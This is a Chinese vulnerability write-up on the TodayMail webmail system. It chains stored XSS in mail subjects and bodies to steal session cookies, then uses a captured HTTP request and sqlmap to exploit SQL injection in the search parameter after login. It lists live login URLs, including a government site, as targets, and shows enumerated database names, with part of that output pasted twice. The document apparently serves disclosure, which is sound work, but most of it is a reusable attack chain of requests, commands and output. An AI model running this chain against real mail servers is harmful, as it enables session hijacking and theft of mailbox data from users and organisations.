时代互联TodayMail系统xss盲打及sql注入(官方demo复现)
时代互联TodayMail系统xss盲打及sql注入(官方demo复现)注入需要登陆
时代互联旗下的邮件系统存在通用注入, 时代互联官网:now.cn 涉及大量网站,包括政府站点,使用量绝对是海量级别的:
http://mail.wfq.gov.cn/webmail/login.php?Cmd=login
http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login
http://mail.qtc.org.cn/webmail/login.php?Cmd=login
http://mail.yphb.com.cn/webmail/login.php?Cmd=login
http://mail.power-ring.cn/webmail/login.php?Cmd=login
-----------
这次发的是组合拳进行SQL注入经过反复测试,只有该唯一办法组合可以进行SQL注入注入产生在对query处的关键字查询过滤不严,但是该功能只对登陆后开放访问权限登陆验证phpsessid,无法伪造登陆用的邮箱和密码均为管理员自己设置的账号和密码而密码强度呢?是几乎不可能破解的我拿了的一个邮箱管理员的账号,可以来看一下设置:
(密码为6个以上字符,只能由字母加数字,或者字母加 "_" , "-" , ".",或者数字加"_" , "-" , "." 组成)
密码强度很大,fuzzing是几乎很难做到的,虽然登陆验证码的设置不强再来看到另一处常规突破口,忘记密码
如图,很遗憾,功能封锁。已经没有其他办法绕过登陆了,那么只剩下----------是的,没错 :
Xss/Csrf
拿到了用户的cookie,甚至只需要phpsessid即可,,就可以登陆该邮箱,然后利用SQL缺陷进行注入攻击经过测试,该邮件系统标题和内容正文处均存在store xss漏洞测试用poc:
和标题一样,官方demo复现!==========================================================================
mail.now.cn
登陆处302到某台cdn
http://cdn621.todayisp.net
那就在这里做测试吧邮箱收集的过程就不再多说,官网、html标记都可以找到下面写一封邮件标题或正文插入:
没过多久就有了结果来看:
成功获取到了cookie,也就拿到了phpsessid怎么用呢?#组合拳,SQL注入(注:登陆后多处未过滤存在注入)将盲打到的用户cookie放入以下data包中:
GET /webmail/main/list_search.php?query=123*&=%E6%90%9C%E7%B4%A2%E9%82%AE%E4%BB%B6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://cdn621.todayisp.net/webmail/main/default.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cdn621.todayisp.net
Proxy-Connection: Keep-Alive
Cookie: CFG_LANGUAGE=gb; PHPSESSID=*********; LoginDomain=******; cookie_name=*********
保存为1.txt (123*为未过滤注入处)接着使用sqlmap:
sqlmap -r c:/1.txt --dbs
直接获得注入结果:
全部数据库:
available databases [109]:
[*] information_schema
[*] MailFailRecord
[*] MailTemp-1
[*] MailTemp00
[*] MailTemp01
[*] MailTemp02
[*] MailTemp03
全部数据库:
available databases [109]:
[*] information_schema
[*] MailFailRecord
[*] MailTemp-1
[*] MailTemp00
[*] MailTemp01
[*] MailTemp02
[*] MailTemp03
[*] MailTemp04
[*] MailTemp05
[*] MailTemp06
[*] MailTemp07
[*] MailTemp08
[*] MailTemp09
[*] MailTemp10
[*] MailTemp11
[*] MailTemp12
[*] MailTemp13
[*] MailTemp14
[*] MailTemp15
[*] MailTemp16
[*] MailTemp17
[*] MailTemp18
[*] MailTemp19
[*] MailTemp20
[*] MailTemp21
[*] MailTemp22
[*] MailTemp23
[*] MailTemp24
[*] MailTemp25
[*] MailTemp26
[*] MailTemp27
[*] MailTemp28
[*] MailTemp29
[*] MailTemp30
[*] MailTemp31
[*] MailTemp32
[*] MailTemp33
[*] MailTemp34
[*] MailTemp35
[*] MailTemp36
[*] MailTemp37
[*] MailTemp38
[*] MailTemp39
[*] MailTemp40
[*] MailTemp41
[*] MailTemp42
[*] MailTemp43
[*] MailTemp44
[*] MailTemp45
[*] MailTemp46
[*] MailTemp47
[*] MailTemp48
[*] MailTemp49
[*] MailTemp50
[*] MailTemp51
[*] MailTemp52
[*] MailTemp53
[*] MailTemp54
[*] MailTemp55
[*] MailTemp56
[*] MailTemp57
[*] MailTemp58
[*] MailTemp59
[*] MailTemp60
[*] MailTemp61
[*] MailTemp62
[*] MailTemp63
[*] MailTemp64
[*] MailTemp65
[*] MailTemp66
[*] MailTemp67
[*] MailTemp68
[*] MailTemp69
[*] MailTemp70
[*] MailTemp71
[*] MailTemp72
[*] MailTemp73
[*] MailTemp74
[*] MailTemp75
[*] MailTemp76
[*] MailTemp77
[*] MailTemp78
[*] MailTemp79
[*] MailTemp80
[*] MailTemp81
[*] MailTemp82
[*] MailTemp83
[*] MailTemp84
[*] MailTemp85
[*] MailTemp86
[*] MailTemp87
[*] MailTemp88
[*] MailTemp89
[*] MailTemp90
[*] MailTemp91
[*] MailTemp92
[*] MailTemp93
[*] MailTemp94
[*] MailTemp95
[*] MailTemp96
[*] MailTemp97
[*] MailTemp98
[*] MailTemp99
[*] mysql
[*] NewTodaymail
[*] proftpd
[*] test
[*] todaymail
[*] todaymail20101208
[*] MailTemp04
[*] MailTemp05
[*] MailTemp06
[*] MailTemp07
[*] MailTemp08
[*] MailTemp09
[*] MailTemp10
[*] MailTemp11
[*] MailTemp12
[*] MailTemp13
[*] MailTemp14
[*] MailTemp15
[*] MailTemp16
[*] MailTemp17
[*] MailTemp18
[*] MailTemp19
[*] MailTemp20
[*] MailTemp21
[*] MailTemp22
[*] MailTemp23
[*] MailTemp24
[*] MailTemp25
[*] MailTemp26
[*] MailTemp27
[*] MailTemp28
[*] MailTemp29
[*] MailTemp30
[*] MailTemp31
[*] MailTemp32
[*] MailTemp33
[*] MailTemp34
[*] MailTemp35
[*] MailTemp36
[*] MailTemp37
[*] MailTemp38
[*] MailTemp39
[*] MailTemp40
[*] MailTemp41
[*] MailTemp42
[*] MailTemp43
[*] MailTemp44
[*] MailTemp45
[*] MailTemp46
[*] MailTemp47
[*] MailTemp48
[*] MailTemp49
[*] MailTemp50
[*] MailTemp51
[*] MailTemp52
[*] MailTemp53
[*] MailTemp54
[*] MailTemp55
[*] MailTemp56
[*] MailTemp57
[*] MailTemp58
[*] MailTemp59
[*] MailTemp60
[*] MailTemp61
[*] MailTemp62
[*] MailTemp63
[*] MailTemp64
[*] MailTemp65
[*] MailTemp66
[*] MailTemp67
[*] MailTemp68
[*] MailTemp69
[*] MailTemp70
[*] MailTemp71
[*] MailTemp72
[*] MailTemp73
[*] MailTemp74
[*] MailTemp75
[*] MailTemp76
[*] MailTemp77
[*] MailTemp78
[*] MailTemp79
[*] MailTemp80
[*] MailTemp81
[*] MailTemp82
[*] MailTemp83
[*] MailTemp84
[*] MailTemp85
[*] MailTemp86
[*] MailTemp87
[*] MailTemp88
[*] MailTemp89
[*] MailTemp90
[*] MailTemp91
[*] MailTemp92
[*] MailTemp93
[*] MailTemp94
[*] MailTemp95
[*] MailTemp96
[*] MailTemp97
[*] MailTemp98
[*] MailTemp99
[*] mysql
[*] NewTodaymail
[*] proftpd
[*] test
[*] todaymail
[*] todaymail20101208
解决方案:
过滤